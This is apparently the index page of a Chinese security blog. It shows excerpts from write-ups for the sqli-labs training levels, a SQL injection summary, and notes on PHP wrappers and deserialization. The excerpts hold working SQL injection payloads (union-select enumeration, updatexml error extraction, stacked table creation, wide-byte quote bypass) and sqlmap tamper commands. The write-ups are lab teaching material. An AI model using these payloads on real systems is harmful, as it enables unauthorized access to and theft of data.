hu1y40's blog

hu1y40'blog
天堂的穹空遍布地狱之火的颜色,但也是天堂。
SQL注入

SQL注入总结

SQL注入 注入点探测 注入点类型 数字型 通过2-1与1的回显结果判断是否为数字型注入。有可能被()或者(())括起来。 字符型 注入点被' '," "包围,用单引号闭合并且注释掉后续的内容即可注入。同理可能被(),(())包裹。 注入点位置 post表单 http报文的某些字段 如cookie reffer等 get参数 常用函数 系统函数 version() --- 获取mysql版本 user() --- 数据库用户名 database() --- 数据库名称 @@datadir --- 数据库路径 @@v…

2023年10月7日 0条评论 1959点热度 1人点赞 hu1y40 阅读全文
sqli-labs

sqli-labs 61-70

61 payload:?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 62 payload:?id=1') and (length(database())=10) %23 或者 payload:?id=1' and (length(database())=10) and '1'='1 本题次数限制130次,爆破是没办法了。 import requests import time chSet = "0123456789ABCDE…

2023年10月7日 0条评论 618点热度 0人点赞 hu1y40 阅读全文
sqli-labs

sqli-labs 51-60

51 堆叠注入 payload:?sort=1%27;%20create%20table%20test51%20like%20users--+ 52 堆叠注入 payload:?sort=username;%20create%20table%20test52%20like%20users; 53 堆叠注入 payload:?sort=1%27;%20create%20table%20test53%20like%20users;--+ 54 ?id=-1%27%20union%20select%201,databas…

2023年10月7日 0条评论 713点热度 0人点赞 hu1y40 阅读全文
sqli-labs

sqli-labs 41-50

41 payload:?id=1%20;%20create%20table%20test41%20like%20users;--+ 42 步骤 手动 function sqllogin($host,$dbuser,$dbpass, $dbname){ // connectivity //mysql connections for stacked query examples. $con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname); $username = my…

2023年10月7日 0条评论 721点热度 0人点赞 hu1y40 阅读全文
sqli-labs

sqli-labs 31-40

32 步骤 手动 宽字节注入原理:php中编码为gbk,函数执行添加的是ascii编码,当mysql使用gbk的时候,%df会与\组成%df%5c为一个宽字符。 payload:?id=0%df%27%20union%20select%201,2,3--+ sqlmap python sqlmap.py -r temp.txt --tamper unmagicquotes.py --batch --dbms mysql 33 同32,看源码32是自己编写addslash函数,33是php自带的addslashes(…

2023年10月7日 0条评论 639点热度 0人点赞 hu1y40 阅读全文
sqli-labs

sqli-labs 21-30

21 步骤 手动 注入点: cookie sqlmap python sqlmap.py -r temp.txt --tamper base64encode.py --batch --dbms mysql 22 同上,')改为" 23 过滤了注释符,闭合后续单引号即可 sqlmap 24 步骤 手动 if (isset($_POST['submit'])) { # Validating the user input........ $username= $_SESSION["username"]; $curr_pa…

2023年10月7日 0条评论 626点热度 0人点赞 hu1y40 阅读全文
sqli-labs

sqli-labs 11-20

sqli-labs 11-20 11 步骤 手动 1.报错注入 payload: 1‘ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) # sqlmap 12 步骤 手动 注入点: 1.报错注入 payload: 1") and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) # sqlmap 13 步骤 手动 注入点: 1.报错注入 payload: 1') and (updatexml(1,con…

2023年10月7日 0条评论 572点热度 0人点赞 hu1y40 阅读全文
sqli-labs

sqli-labs 1-10

sqli-labs 1-10 1 步骤 手动 报错信息' '1'' LIMIT 0,1 '即是字符型注入 用 ’ 闭合单引号并 --+ 注释后续语句即可构造payload 使用order by判断字段数,一共有三个字段。 使用联合查询爆破数据库名 payload: ?id=-1%27 union select 1,group_concat(schema_name),3 from information_schema.schemata--+ 使用联合查询爆破表名 payload: ?id=-1%27 union se…

2023年10月7日 0条评论 775点热度 0人点赞 hu1y40 阅读全文
PHP伪协议

PHP伪协议

PHP伪协议 file协议 条件 php.ini中 allow_url_fopen:off/on allow_url_include:off/on 作用 用来访问本地文件系统,ctf中读取文件且不受allow_url_fopen和allow_url_include的影响 include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。 php协议 条件 php.ini中 all…

2023年10月7日 0条评论 1731点热度 1人点赞 hu1y40 阅读全文
WEB

PHP反序列化

PHP反序列化 简述 序列化是将对象保存为可保持或可传输的格式的过程(其实我觉得对象的内存dump下来也可以保存,但是传输的过程中会不会造成信息的失真,或者说传输的数据大小是否会变大,这个需要进行试验分析。)反序列化是与其相对的一个概念,它将数据流(其实每次输入我总感觉是一个json的字符串当然说其为数据流也没问题。)转换为对象。 作用 若反序列化的参数可控,则可以构造任意变量。若代码中有一个类则可以构造此类的对象。 反序列化格式 类型:d ->d代表一个整型数字 O:d -> 对象 ->d代表该…

2023年10月7日 0条评论 1278点热度 0人点赞 hu1y40 阅读全文
1…56789…15

近期文章

  • 加密算法
  • 2023年度总结
  • RTSPServer StackOverflow Vulnerability
  • FUZZ 总览篇
  • MP4Box 无限循环漏洞

近期评论

  1. EALSEN 发表在 CVE-2023-40477 Winrar RCE漏洞分析
  2. hu1y40 发表在 钓鱼手法
  3. hu1y40 发表在 Cobalt Strike 初探
  4. hu1y40 发表在 CVE-2010-2553 MicrosoftWindows Cinepak 编码解码器解压缩漏洞
书签
  • neko的博客

COPYRIGHT © 2023 hu1y40's blog. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

鄂ICP备2021009673号-1